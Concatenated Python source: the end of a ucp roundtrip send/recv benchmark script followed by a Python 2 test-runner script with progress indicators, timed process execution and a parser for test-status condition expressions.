"--object_type",
default="numpy",
choices=["numpy", "cupy"],
help="In-memory array type.",
)
parser.add_argument(
"-v",
"--verbose",
default=False,
action="store_true",
help="Whether to print timings per iteration.",
)
parser.add_argument(
"-s",
"--server-address",
metavar="ip",
default=ucp.get_address(),
type=str,
help="Server address (default `ucp.get_address()`).",
)
parser.add_argument(
"-d",
"--server-dev",
metavar="N",
default=0,
type=int,
help="GPU device on server (default 0).",
)
parser.add_argument(
"-e",
"--client-dev",
metavar="N",
default=0,
type=int,
help="GPU device on client (default 0).",
)
parser.add_argument(
"--reuse-alloc",
default=False,
action="store_true",
help="Reuse memory allocations between communication.",
)
parser.add_argument(
"--cuda-profile",
default=False,
action="store_true",
help="Setting CUDA profiler.start()/stop() around send/recv "
"typically used with `nvprof --profile-from-start off "
"--profile-child-processes`",
)
args = parser.parse_args()
if args.cuda_profile and args.object_type != "cupy":
raise RuntimeError("`--cuda-profile` requires `--object_type=cupy`")
return args
def main():
args = parse_args()
q1 = mp.Queue()
p1 = mp.Process(target=server, args=(q1, args))
p1.start()
port = q1.get()
q2 = mp.Queue()
p2 = mp.Process(target=client, args=(q2, port, args))
p2.start()
times = q2.get()
p1.join()
p2.join()
assert not p1.exitcode
assert not p2.exitcode
assert len(times) == args.n_iter
print("Roundtrip benchmark")
print("--------------------------")
print(f"n_iter | {args.n_iter}")
print(f"n_bytes | {format_bytes(args.n_bytes)}")
print(f"object | {args.object_type}")
print(f"reuse alloc | {args.reuse_alloc}")
print("==========================")
if args.object_type == "cupy":
print(f"Device(s) | {args.server_dev}, {args.client_dev}")
else:
        print("Device(s) | Single CPU")
print(
f"Average | {format_bytes(2 * args.n_iter * args.n_bytes / sum(times))}/s"
)
print("--------------------------")
print("Iterations")
print("--------------------------")
for i, t in enumerate(times):
ts = format_bytes(2 * args.n_bytes / t)
ts = (" " * (9 - len(ts))) + ts
print("%03d |%s/s" % (i, ts))
if __name__ == "__main__":
main()
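# Example invocations (assumptions about the environment, not part of the
# benchmark itself): the CuPy variant requires CUDA-capable GPUs, and
# --cuda-profile additionally expects the script to be run under nvprof.
#
#   python local-send-recv.py --n-bytes "100 Mb" --n-iter 20 --reuse-alloc
#   python local-send-recv.py -o cupy -d 0 -e 1 -n "1 Gb" --reuse-alloc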
|
test.py
|
#!/usr/bin/env python
#
# Copyright 2008 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import imp
import logging
import optparse
import os
import re
import signal
import subprocess
import sys
import tempfile
import time
import threading
import utils
import multiprocessing
import errno
from os.path import join, dirname, abspath, basename, isdir, exists
from datetime import datetime
from Queue import Queue, Empty
logger = logging.getLogger('testrunner')
skip_regex = re.compile(r'# SKIP\S*\s+(.*)', re.IGNORECASE)
VERBOSE = False
# ---------------------------------------------
# --- P r o g r e s s I n d i c a t o r s ---
# ---------------------------------------------
class ProgressIndicator(object):
def __init__(self, cases, flaky_tests_mode):
self.cases = cases
self.flaky_tests_mode = flaky_tests_mode
self.parallel_queue = Queue(len(cases))
self.sequential_queue = Queue(len(cases))
for case in cases:
if case.parallel:
self.parallel_queue.put_nowait(case)
else:
self.sequential_queue.put_nowait(case)
self.succeeded = 0
self.remaining = len(cases)
self.total = len(cases)
self.failed = [ ]
self.flaky_failed = [ ]
self.crashed = 0
self.flaky_crashed = 0
self.lock = threading.Lock()
self.shutdown_event = threading.Event()
def PrintFailureHeader(self, test):
if test.IsNegative():
negative_marker = '[negative] '
else:
negative_marker = ''
print "=== %(label)s %(negative)s===" % {
'label': test.GetLabel(),
'negative': negative_marker
}
print "Path: %s" % "/".join(test.path)
def Run(self, tasks):
self.Starting()
threads = []
# Spawn N-1 threads and then use this thread as the last one.
# That way -j1 avoids threading altogether which is a nice fallback
# in case of threading problems.
for i in xrange(tasks - 1):
thread = threading.Thread(target=self.RunSingle, args=[True, i + 1])
threads.append(thread)
thread.start()
try:
self.RunSingle(False, 0)
# Wait for the remaining threads
for thread in threads:
# Use a timeout so that signals (ctrl-c) will be processed.
thread.join(timeout=10000000)
except (KeyboardInterrupt, SystemExit), e:
self.shutdown_event.set()
except Exception, e:
# If there's an exception we schedule an interruption for any
# remaining threads.
self.shutdown_event.set()
# ...and then reraise the exception to bail out
raise
self.Done()
return not self.failed
def RunSingle(self, parallel, thread_id):
while not self.shutdown_event.is_set():
try:
test = self.parallel_queue.get_nowait()
except Empty:
if parallel:
return
try:
test = self.sequential_queue.get_nowait()
except Empty:
return
case = test.case
case.thread_id = thread_id
self.lock.acquire()
self.AboutToRun(case)
self.lock.release()
try:
start = datetime.now()
output = case.Run()
# SmartOS has a bug that causes unexpected ECONNREFUSED errors.
# See https://smartos.org/bugview/OS-2767
# If ECONNREFUSED on SmartOS, retry the test one time.
if (output.UnexpectedOutput() and
sys.platform == 'sunos5' and
'ECONNREFUSED' in output.output.stderr):
output = case.Run()
output.diagnostic.append('ECONNREFUSED received, test retried')
case.duration = (datetime.now() - start)
except IOError, e:
return
if self.shutdown_event.is_set():
return
self.lock.acquire()
if output.UnexpectedOutput():
if FLAKY in output.test.outcomes and self.flaky_tests_mode == DONTCARE:
self.flaky_failed.append(output)
if output.HasCrashed():
self.flaky_crashed += 1
else:
self.failed.append(output)
if output.HasCrashed():
self.crashed += 1
else:
self.succeeded += 1
self.remaining -= 1
self.HasRun(output)
self.lock.release()
def EscapeCommand(command):
parts = []
for part in command:
if ' ' in part:
# Escape spaces. We may need to escape more characters for this
# to work properly.
parts.append('"%s"' % part)
else:
parts.append(part)
return " ".join(parts)
class SimpleProgressIndicator(ProgressIndicator):
def Starting(self):
print 'Running %i tests' % len(self.cases)
def Done(self):
print
for failed in self.failed:
self.PrintFailureHeader(failed.test)
if failed.output.stderr:
print "--- stderr ---"
print failed.output.stderr.strip()
if failed.output.stdout:
print "--- stdout ---"
print failed.output.stdout.strip()
print "Command: %s" % EscapeCommand(failed.command)
if failed.HasCrashed():
print "--- %s ---" % PrintCrashed(failed.output.exit_code)
if failed.HasTimedOut():
print "--- TIMEOUT ---"
if len(self.failed) == 0:
print "==="
print "=== All tests succeeded"
print "==="
else:
print
print "==="
print "=== %i tests failed" % len(self.failed)
if self.crashed > 0:
print "=== %i tests CRASHED" % self.crashed
print "==="
class VerboseProgressIndicator(SimpleProgressIndicator):
def AboutToRun(self, case):
print 'Starting %s...' % case.GetLabel()
sys.stdout.flush()
def HasRun(self, output):
if output.UnexpectedOutput():
if output.HasCrashed():
outcome = 'CRASH'
else:
outcome = 'FAIL'
else:
outcome = 'pass'
print 'Done running %s: %s' % (output.test.GetLabel(), outcome)
class DotsProgressIndicator(SimpleProgressIndicator):
def AboutToRun(self, case):
pass
def HasRun(self, output):
total = self.succeeded + len(self.failed)
if (total > 1) and (total % 50 == 1):
sys.stdout.write('\n')
if output.UnexpectedOutput():
if output.HasCrashed():
sys.stdout.write('C')
sys.stdout.flush()
elif output.HasTimedOut():
sys.stdout.write('T')
sys.stdout.flush()
else:
sys.stdout.write('F')
sys.stdout.flush()
else:
sys.stdout.write('.')
sys.stdout.flush()
class TapProgressIndicator(SimpleProgressIndicator):
def _printDiagnostic(self, messages):
for l in messages.splitlines():
logger.info('# ' + l)
def Starting(self):
logger.info('1..%i' % len(self.cases))
self._done = 0
def AboutToRun(self, case):
pass
def HasRun(self, output):
self._done += 1
# Print test name as (for example) "parallel/test-assert". Tests that are
# scraped from the addons documentation are all named test.js, making it
# hard to decipher what test is running when only the filename is printed.
prefix = abspath(join(dirname(__file__), '../test')) + os.sep
command = output.command[-1]
if command.endswith('.js'): command = command[:-3]
if command.startswith(prefix): command = command[len(prefix):]
command = command.replace('\\', '/')
if output.UnexpectedOutput():
status_line = 'not ok %i %s' % (self._done, command)
if FLAKY in output.test.outcomes and self.flaky_tests_mode == DONTCARE:
status_line = status_line + ' # TODO : Fix flaky test'
logger.info(status_line)
self._printDiagnostic("\n".join(output.diagnostic))
if output.HasCrashed():
self._printDiagnostic(PrintCrashed(output.output.exit_code))
if output.HasTimedOut():
self._printDiagnostic('TIMEOUT')
self._printDiagnostic(output.output.stderr)
self._printDiagnostic(output.output.stdout)
else:
skip = skip_regex.search(output.output.stdout)
if skip:
logger.info(
'ok %i %s # skip %s' % (self._done, command, skip.group(1)))
else:
status_line = 'ok %i %s' % (self._done, command)
if FLAKY in output.test.outcomes:
status_line = status_line + ' # TODO : Fix flaky test'
logger.info(status_line)
self._printDiagnostic("\n".join(output.diagnostic))
duration = output.test.duration
# total_seconds() was added in 2.7
total_seconds = (duration.microseconds +
(duration.seconds + duration.days * 24 * 3600) * 10**6) / 10**6
# duration_ms is measured in seconds and is read as such by TAP parsers.
# It should read as "duration including ms" rather than "duration in ms"
logger.info(' ---')
logger.info(' duration_ms: %d.%d' % (total_seconds, duration.microseconds / 1000))
logger.info(' ...')
def Done(self):
pass
class CompactProgressIndicator(ProgressIndicator):
def __init__(self, cases, flaky_tests_mode, templates):
super(CompactProgressIndicator, self).__init__(cases, flaky_tests_mode)
self.templates = templates
self.last_status_length = 0
self.start_time = time.time()
def Starting(self):
pass
def Done(self):
self.PrintProgress('Done')
def AboutToRun(self, case):
self.PrintProgress(case.GetLabel())
def HasRun(self, output):
if output.UnexpectedOutput():
self.ClearLine(self.last_status_length)
self.PrintFailureHeader(output.test)
stdout = output.output.stdout.strip()
if len(stdout):
print self.templates['stdout'] % stdout
stderr = output.output.stderr.strip()
if len(stderr):
print self.templates['stderr'] % stderr
print "Command: %s" % EscapeCommand(output.command)
if output.HasCrashed():
print "--- %s ---" % PrintCrashed(output.output.exit_code)
if output.HasTimedOut():
print "--- TIMEOUT ---"
def Truncate(self, str, length):
if length and (len(str) > (length - 3)):
return str[:(length-3)] + "..."
else:
return str
def PrintProgress(self, name):
self.ClearLine(self.last_status_length)
elapsed = time.time() - self.start_time
status = self.templates['status_line'] % {
'passed': self.succeeded,
'remaining': (((self.total - self.remaining) * 100) // self.total),
'failed': len(self.failed),
'test': name,
'mins': int(elapsed) / 60,
'secs': int(elapsed) % 60
}
status = self.Truncate(status, 78)
self.last_status_length = len(status)
print status,
sys.stdout.flush()
class ColorProgressIndicator(CompactProgressIndicator):
def __init__(self, cases, flaky_tests_mode):
templates = {
'status_line': "[%(mins)02i:%(secs)02i|\033[34m%%%(remaining) 4d\033[0m|\033[32m+%(passed) 4d\033[0m|\033[31m-%(failed) 4d\033[0m]: %(test)s",
'stdout': "\033[1m%s\033[0m",
'stderr': "\033[31m%s\033[0m",
}
super(ColorProgressIndicator, self).__init__(cases, flaky_tests_mode, templates)
def ClearLine(self, last_line_length):
print "\033[1K\r",
class MonochromeProgressIndicator(CompactProgressIndicator):
def __init__(self, cases, flaky_tests_mode):
templates = {
'status_line': "[%(mins)02i:%(secs)02i|%%%(remaining) 4d|+%(passed) 4d|-%(failed) 4d]: %(test)s",
'stdout': '%s',
'stderr': '%s',
'clear': lambda last_line_length: ("\r" + (" " * last_line_length) + "\r"),
'max_length': 78
}
super(MonochromeProgressIndicator, self).__init__(cases, flaky_tests_mode, templates)
def ClearLine(self, last_line_length):
print ("\r" + (" " * last_line_length) + "\r"),
PROGRESS_INDICATORS = {
'verbose': VerboseProgressIndicator,
'dots': DotsProgressIndicator,
'color': ColorProgressIndicator,
'tap': TapProgressIndicator,
'mono': MonochromeProgressIndicator
}
# -------------------------
# --- F r a m e w o r k ---
# -------------------------
class CommandOutput(object):
def __init__(self, exit_code, timed_out, stdout, stderr):
self.exit_code = exit_code
self.timed_out = timed_out
self.stdout = stdout
self.stderr = stderr
self.failed = None
class TestCase(object):
def __init__(self, context, path, arch, mode):
self.path = path
self.context = context
self.duration = None
self.arch = arch
self.mode = mode
self.parallel = False
self.thread_id = 0
def IsNegative(self):
return self.context.expect_fail
def CompareTime(self, other):
return cmp(other.duration, self.duration)
def DidFail(self, output):
if output.failed is None:
output.failed = self.IsFailureOutput(output)
return output.failed
def IsFailureOutput(self, output):
return output.exit_code != 0
def GetSource(self):
return "(no source available)"
def RunCommand(self, command, env):
full_command = self.context.processor(command)
output = Execute(full_command,
self.context,
self.context.GetTimeout(self.mode),
env)
self.Cleanup()
return TestOutput(self,
full_command,
output,
self.context.store_unexpected_output)
def BeforeRun(self):
pass
def AfterRun(self, result):
pass
def Run(self):
self.BeforeRun()
try:
result = self.RunCommand(self.GetCommand(), {
"TEST_THREAD_ID": "%d" % self.thread_id
})
finally:
# Tests can leave the tty in non-blocking mode. If the test runner
# tries to print to stdout/stderr after that and the tty buffer is
# full, it'll die with a EAGAIN OSError. Ergo, put the tty back in
# blocking mode before proceeding.
if sys.platform != 'win32':
from fcntl import fcntl, F_GETFL, F_SETFL
from os import O_NONBLOCK
for fd in 0,1,2: fcntl(fd, F_SETFL, ~O_NONBLOCK & fcntl(fd, F_GETFL))
self.AfterRun(result)
return result
def Cleanup(self):
return
class TestOutput(object):
def __init__(self, test, command, output, store_unexpected_output):
self.test = test
self.command = command
self.output = output
self.store_unexpected_output = store_unexpected_output
self.diagnostic = []
def UnexpectedOutput(self):
if self.HasCrashed():
outcome = CRASH
elif self.HasTimedOut():
outcome = TIMEOUT
elif self.HasFailed():
outcome = FAIL
else:
outcome = PASS
return not outcome in self.test.outcomes
def HasPreciousOutput(self):
return self.UnexpectedOutput() and self.store_unexpected_output
def HasCrashed(self):
if utils.IsWindows():
return 0x80000000 & self.output.exit_code and not (0x3FFFFF00 & self.output.exit_code)
else:
# Timed out tests will have exit_code -signal.SIGTERM.
if self.output.timed_out:
return False
return self.output.exit_code < 0 and \
self.output.exit_code != -signal.SIGABRT
def HasTimedOut(self):
    return self.output.timed_out
def HasFailed(self):
execution_failed = self.test.DidFail(self.output)
if self.test.IsNegative():
return not execution_failed
else:
return execution_failed
def KillProcessWithID(pid):
if utils.IsWindows():
os.popen('taskkill /T /F /PID %d' % pid)
else:
os.kill(pid, signal.SIGTERM)
MAX_SLEEP_TIME = 0.1
INITIAL_SLEEP_TIME = 0.0001
SLEEP_TIME_FACTOR = 1.25
SEM_INVALID_VALUE = -1
SEM_NOGPFAULTERRORBOX = 0x0002 # Microsoft Platform SDK WinBase.h
def Win32SetErrorMode(mode):
prev_error_mode = SEM_INVALID_VALUE
try:
import ctypes
    prev_error_mode = ctypes.windll.kernel32.SetErrorMode(mode)
except ImportError:
pass
return prev_error_mode
def RunProcess(context, timeout, args, **rest):
if context.verbose: print "#", " ".join(args)
popen_args = args
  prev_error_mode = SEM_INVALID_VALUE
if utils.IsWindows():
if context.suppress_dialogs:
# Try to change the error mode to avoid dialogs on fatal errors. Don't
# touch any existing error mode flags by merging the existing error mode.
# See http://blogs.msdn.com/oldnewthing/archive/2004/07/27/198410.aspx.
      error_mode = SEM_NOGPFAULTERRORBOX
      prev_error_mode = Win32SetErrorMode(error_mode)
      Win32SetErrorMode(error_mode | prev_error_mode)
faketty = rest.pop('faketty', False)
pty_out = rest.pop('pty_out')
process = subprocess.Popen(
shell = utils.IsWindows(),
args = popen_args,
**rest
)
if faketty:
os.close(rest['stdout'])
if utils.IsWindows() and context.suppress_dialogs and prev_error_mode != SEM_INVALID_VALUE:
Win32SetErrorMode(prev_error_mode)
# Compute the end time - if the process crosses this limit we
# consider it timed out.
if timeout is None: end_time = None
else: end_time = time.time() + timeout
timed_out = False
# Repeatedly check the exit code from the process in a
# loop and keep track of whether or not it times out.
exit_code = None
sleep_time = INITIAL_SLEEP_TIME
output = ''
if faketty:
while True:
if time.time() >= end_time:
# Kill the process and wait for it to exit.
KillProcessWithID(process.pid)
exit_code = process.wait()
timed_out = True
break
# source: http://stackoverflow.com/a/12471855/1903116
# related: http://stackoverflow.com/q/11165521/1903116
try:
data = os.read(pty_out, 9999)
except OSError as e:
if e.errno != errno.EIO:
raise
break # EIO means EOF on some systems
else:
if not data: # EOF
break
output += data
while exit_code is None:
if (not end_time is None) and (time.time() >= end_time):
# Kill the process and wait for it to exit.
KillProcessWithID(process.pid)
exit_code = process.wait()
timed_out = True
else:
exit_code = process.poll()
time.sleep(sleep_time)
sleep_time = sleep_time * SLEEP_TIME_FACTOR
if sleep_time > MAX_SLEEP_TIME:
sleep_time = MAX_SLEEP_TIME
return (process, exit_code, timed_out, output)
def PrintError(str):
sys.stderr.write(str)
sys.stderr.write('\n')
def CheckedUnlink(name):
while True:
try:
os.unlink(name)
except OSError, e:
# On Windows unlink() fails if another process (typically a virus scanner
# or the indexing service) has the file open. Those processes keep a
# file open for a short time only, so yield and try again; it'll succeed.
if sys.platform == 'win32' and e.errno == errno.EACCES:
time.sleep(0)
continue
PrintError("os.unlink() " + str(e))
break
def Execute(args, context, timeout=None, env={}, faketty=False):
if faketty:
import pty
(out_master, fd_out) = pty.openpty()
fd_err = fd_out
pty_out = out_master
else:
(fd_out, outname) = tempfile.mkstemp()
(fd_err, errname) = tempfile.mkstemp()
pty_out = None
# Extend environment
env_copy = os.environ.copy()
for key, value in env.iteritems():
env_copy[key] = value
(process, exit_code, timed_out, output) = RunProcess(
context,
timeout,
args = args,
stdout = fd_out,
stderr = fd_err,
env = env_copy,
faketty = faketty,
pty_out = pty_out
)
if faketty:
os.close(out_master)
errors = ''
else:
os.close(fd_out)
os.close(fd_err)
output = file(outname).read()
errors = file(errname).read()
CheckedUnlink(outname)
CheckedUnlink(errname)
return CommandOutput(exit_code, timed_out, output, errors)
def CarCdr(path):
if len(path) == 0:
return (None, [ ])
else:
return (path[0], path[1:])
class TestConfiguration(object):
def __init__(self, context, root):
self.context = context
self.root = root
def Contains(self, path, file):
if len(path) > len(file):
return False
for i in xrange(len(path)):
if not path[i].match(file[i]):
return False
return True
def GetTestStatus(self, sections, defs):
pass
class TestSuite(object):
def __init__(self, name):
self.name = name
def GetName(self):
return self.name
# Use this to run several variants of the tests, e.g.:
# VARIANT_FLAGS = [[], ['--always_compact', '--noflush_code']]
VARIANT_FLAGS = [[]]
class TestRepository(TestSuite):
def __init__(self, path):
normalized_path = abspath(path)
super(TestRepository, self).__init__(basename(normalized_path))
self.path = normalized_path
self.is_loaded = False
self.config = None
def GetConfiguration(self, context):
if self.is_loaded:
return self.config
self.is_loaded = True
file = None
try:
(file, pathname, description) = imp.find_module('testcfg', [ self.path ])
module = imp.load_module('testcfg', file, pathname, description)
self.config = module.GetConfiguration(context, self.path)
if hasattr(self.config, 'additional_flags'):
self.config.additional_flags += context.node_args
else:
self.config.additional_flags = context.node_args
finally:
if file:
file.close()
return self.config
def GetBuildRequirements(self, path, context):
return self.GetConfiguration(context).GetBuildRequirements()
def AddTestsToList(self, result, current_path, path, context, arch, mode):
for v in VARIANT_FLAGS:
tests = self.GetConfiguration(context).ListTests(current_path, path,
arch, mode)
for t in tests: t.variant_flags = v
result += tests * context.repeat
def GetTestStatus(self, context, sections, defs):
self.GetConfiguration(context).GetTestStatus(sections, defs)
class LiteralTestSuite(TestSuite):
def __init__(self, tests):
super(LiteralTestSuite, self).__init__('root')
self.tests = tests
def GetBuildRequirements(self, path, context):
(name, rest) = CarCdr(path)
result = [ ]
for test in self.tests:
if not name or name.match(test.GetName()):
result += test.GetBuildRequirements(rest, context)
return result
def ListTests(self, current_path, path, context, arch, mode):
(name, rest) = CarCdr(path)
result = [ ]
for test in self.tests:
test_name = test.GetName()
if not name or name.match(test_name):
full_path = current_path + [test_name]
test.AddTestsToList(result, full_path, path, context, arch, mode)
result.sort(cmp=lambda a, b: cmp(a.GetName(), b.GetName()))
return result
def GetTestStatus(self, context, sections, defs):
for test in self.tests:
test.GetTestStatus(context, sections, defs)
SUFFIX = {
'debug' : '_g',
'release' : '' }
FLAGS = {
'debug' : ['--enable-slow-asserts', '--debug-code', '--verify-heap'],
'release' : []}
TIMEOUT_SCALEFACTOR = {
'armv6' : { 'debug' : 12, 'release' : 3 }, # The ARM buildbots are slow.
'arm' : { 'debug' : 8, 'release' : 2 },
'ia32' : { 'debug' : 4, 'release' : 1 },
'ppc' : { 'debug' : 4, 'release' : 1 },
's390' : { 'debug' : 4, 'release' : 1 } }
class Context(object):
def __init__(self, workspace, buildspace, verbose, vm, args, expect_fail,
timeout, processor, suppress_dialogs,
store_unexpected_output, repeat):
self.workspace = workspace
self.buildspace = buildspace
self.verbose = verbose
self.vm_root = vm
self.node_args = args
self.expect_fail = expect_fail
self.timeout = timeout
self.processor = processor
self.suppress_dialogs = suppress_dialogs
self.store_unexpected_output = store_unexpected_output
self.repeat = repeat
def GetVm(self, arch, mode):
if arch == 'none':
name = 'out/Debug/node' if mode == 'debug' else 'out/Release/node'
else:
name = 'out/%s.%s/node' % (arch, mode)
# Currently GYP does not support output_dir for MSVS.
# http://code.google.com/p/gyp/issues/detail?id=40
# It will put the builds into Release/node.exe or Debug/node.exe
if utils.IsWindows():
out_dir = os.path.join(dirname(__file__), "..", "out")
if not exists(out_dir):
if mode == 'debug':
name = os.path.abspath('Debug/node.exe')
else:
name = os.path.abspath('Release/node.exe')
else:
name = os.path.abspath(name + '.exe')
return name
def GetVmFlags(self, testcase, mode):
return testcase.variant_flags + FLAGS[mode]
def GetTimeout(self, mode):
return self.timeout * TIMEOUT_SCALEFACTOR[ARCH_GUESS or 'ia32'][mode]
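# Rough arithmetic for GetTimeout above, assuming the default 60 second timeout:
# if ARCH_GUESS resolves to 'arm', a debug run gets 60 * 8 = 480 seconds, while
# an 'ia32' release run keeps the plain 60 seconds (scale factor 1).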
def RunTestCases(cases_to_run, progress, tasks, flaky_tests_mode):
progress = PROGRESS_INDICATORS[progress](cases_to_run, flaky_tests_mode)
return progress.Run(tasks)
# -------------------------------------------
# --- T e s t C o n f i g u r a t i o n ---
# -------------------------------------------
SKIP = 'skip'
FAIL = 'fail'
PASS = 'pass'
OKAY = 'okay'
TIMEOUT = 'timeout'
CRASH = 'crash'
SLOW = 'slow'
FLAKY = 'flaky'
DONTCARE = 'dontcare'
class Expression(object):
pass
class Constant(Expression):
def __init__(self, value):
self.value = value
def Evaluate(self, env, defs):
return self.value
class Variable(Expression):
def __init__(self, name):
self.name = name
def GetOutcomes(self, env, defs):
if self.name in env: return ListSet([env[self.name]])
else: return Nothing()
class Outcome(Expression):
def __init__(self, name):
self.name = name
def GetOutcomes(self, env, defs):
if self.name in defs:
return defs[self.name].GetOutcomes(env, defs)
else:
return ListSet([self.name])
class Set(object):
pass
class ListSet(Set):
def __init__(self, elms):
self.elms = elms
def __str__(self):
return "ListSet%s" % str(self.elms)
def Intersect(self, that):
if not isinstance(that, ListSet):
return that.Intersect(self)
return ListSet([ x for x in self.elms if x in that.elms ])
def Union(self, that):
if not isinstance(that, ListSet):
return that.Union(self)
return ListSet(self.elms + [ x for x in that.elms if x not in self.elms ])
def IsEmpty(self):
return len(self.elms) == 0
class Everything(Set):
def Intersect(self, that):
return that
def Union(self, that):
return self
def IsEmpty(self):
return False
class Nothing(Set):
def Intersect(self, that):
return self
def Union(self, that):
return that
def IsEmpty(self):
return True
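# Sketch of the outcome-set algebra above (the values are just examples):
#   ListSet(['pass']).Intersect(ListSet(['pass', 'fail'])).elms  -> ['pass']
#   Everything().Intersect(ListSet(['pass']))                    -> that ListSet
#   Nothing().Union(ListSet(['pass']))                           -> that ListSet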
class Operation(Expression):
def __init__(self, left, op, right):
self.left = left
self.op = op
self.right = right
def Evaluate(self, env, defs):
if self.op == '||' or self.op == ',':
return self.left.Evaluate(env, defs) or self.right.Evaluate(env, defs)
elif self.op == 'if':
return False
elif self.op == '==':
inter = self.left.GetOutcomes(env, defs).Intersect(self.right.GetOutcomes(env, defs))
return not inter.IsEmpty()
else:
assert self.op == '&&'
return self.left.Evaluate(env, defs) and self.right.Evaluate(env, defs)
def GetOutcomes(self, env, defs):
if self.op == '||' or self.op == ',':
return self.left.GetOutcomes(env, defs).Union(self.right.GetOutcomes(env, defs))
elif self.op == 'if':
if self.right.Evaluate(env, defs): return self.left.GetOutcomes(env, defs)
else: return Nothing()
else:
assert self.op == '&&'
return self.left.GetOutcomes(env, defs).Intersect(self.right.GetOutcomes(env, defs))
def IsAlpha(str):
for char in str:
if not (char.isalpha() or char.isdigit() or char == '_'):
return False
return True
class Tokenizer(object):
"""A simple string tokenizer that chops expressions into variables,
parens and operators"""
def __init__(self, expr):
self.index = 0
self.expr = expr
self.length = len(expr)
self.tokens = None
def Current(self, length = 1):
if not self.HasMore(length): return ""
return self.expr[self.index:self.index+length]
def HasMore(self, length = 1):
return self.index < self.length + (length - 1)
def Advance(self, count = 1):
self.index = self.index + count
def AddToken(self, token):
self.tokens.append(token)
def SkipSpaces(self):
while self.HasMore() and self.Current().isspace():
self.Advance()
def Tokenize(self):
self.tokens = [ ]
while self.HasMore():
self.SkipSpaces()
if not self.HasMore():
return None
if self.Current() == '(':
self.AddToken('(')
self.Advance()
elif self.Current() == ')':
self.AddToken(')')
self.Advance()
elif self.Current() == '$':
self.AddToken('$')
self.Advance()
elif self.Current() == ',':
self.AddToken(',')
self.Advance()
elif IsAlpha(self.Current()):
buf = ""
while self.HasMore() and IsAlpha(self.Current()):
buf += self.Current()
self.Advance()
self.AddToken(buf)
elif self.Current(2) == '&&':
self.AddToken('&&')
self.Advance(2)
elif self.Current(2) == '||':
self.AddToken('||')
self.Advance(2)
elif self.Current(2) == '==':
self.AddToken('==')
self.Advance(2)
else:
return None
return self.tokens
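# Example of the tokenizer output (the expression is made up for illustration):
#   Tokenizer('$mode == debug && ok').Tokenize()
#   -> ['$', 'mode', '==', 'debug', '&&', 'ok']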
class Scanner(object):
"""A simple scanner that can serve out tokens from a given list"""
def __init__(self, tokens):
self.tokens = tokens
self.length = len(tokens)
self.index = 0
def HasMore(self):
return self.index < self.length
def Current(self):
return self.tokens[self.index]
def Advance(self):
self.index = self.index + 1
def ParseAtomicExpression(scan):
if scan.Current() == "true":
scan.Advance()
return Constant(True)
elif scan.Current() == "false":
scan.Advance()
return Constant(False)
elif IsAlpha(scan.Current()):
name = scan.Current()
scan.Advance()
return Outcome(name.lower())
elif scan.Current() == '$':
scan.Advance()
if not IsAlpha(scan.Current()):
return None
name = scan.Current()
scan.Advance()
return Variable(name.lower())
elif scan.Current() == '(':
scan.Advance()
result = ParseLogicalExpression(scan)
if (not result) or (scan.Current() != ')'):
return None
scan.Advance()
return result
else:
return None
BINARIES = ['==']
def ParseOperatorExpression(scan):
left = ParseAtomicExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() in BINARIES):
op = scan.Current()
scan.Advance()
right = ParseOperatorExpression(scan)
if not right:
return None
left = Operation(left, op, right)
return left
def ParseConditionalExpression(scan):
left = ParseOperatorExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() == 'if'):
scan.Advance()
right = ParseOperatorExpression(scan)
if not right:
return None
    left = Operation(left, 'if', right)
return left
LOGICALS = ["&&", "||", ","]
def ParseLogicalExpression(scan):
left = ParseConditionalExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() in LOGICALS):
op = scan.Current()
scan.Advance()
right = ParseConditionalExpression(scan)
if not right:
return None
left = Operation(left, op, right)
return left
def ParseCondition(expr):
"""Parses a logical expression into an Expression object"""
tokens = Tokenizer(expr).Tokenize()
if not tokens:
print "Malformed expression: '%s'" % expr
return None
scan = Scanner(tokens)
ast = ParseLogicalExpression(scan)
if not ast:
print "Malformed expression: '%s'" % expr
return None
if scan.HasMore():
print "Malformed expression: '%s'" % expr
return None
return ast
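# Example of parsing and evaluating a condition (the env values are hypothetical):
#   ast = ParseCondition('$mode == debug')
#   ast.Evaluate({'mode': 'debug', 'arch': 'x64'}, {})    # -> True
#   ast.Evaluate({'mode': 'release', 'arch': 'x64'}, {})  # -> False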
class ClassifiedTest(object):
def __init__(self, case, outcomes):
self.case = case
self.outcomes = outcomes
self.parallel = self.case.parallel
class Configuration(object):
"""The parsed contents of a configuration file"""
def __init__(self, sections, defs):
self.sections = sections
self.defs = defs
def ClassifyTests(self, cases, env):
sections = [s for s in self.sections if s.condition.Evaluate(env, self.defs)]
all_rules = reduce(list.__add__, [s.rules for s in sections], [])
unused_rules = set(all_rules)
result = [ ]
all_outcomes = set([])
for case in cases:
matches = [ r for r in all_rules if r.Contains(case.path) ]
outcomes = set([])
for rule in matches:
outcomes = outcomes.union(rule.GetOutcomes(env, self.defs))
unused_rules.discard(rule)
if not outcomes:
outcomes = [PASS]
case.outcomes = outcomes
all_outcomes = all_outcomes.union(outcomes)
result.append(ClassifiedTest(case, outcomes))
return (result, list(unused_rules), all_outcomes)
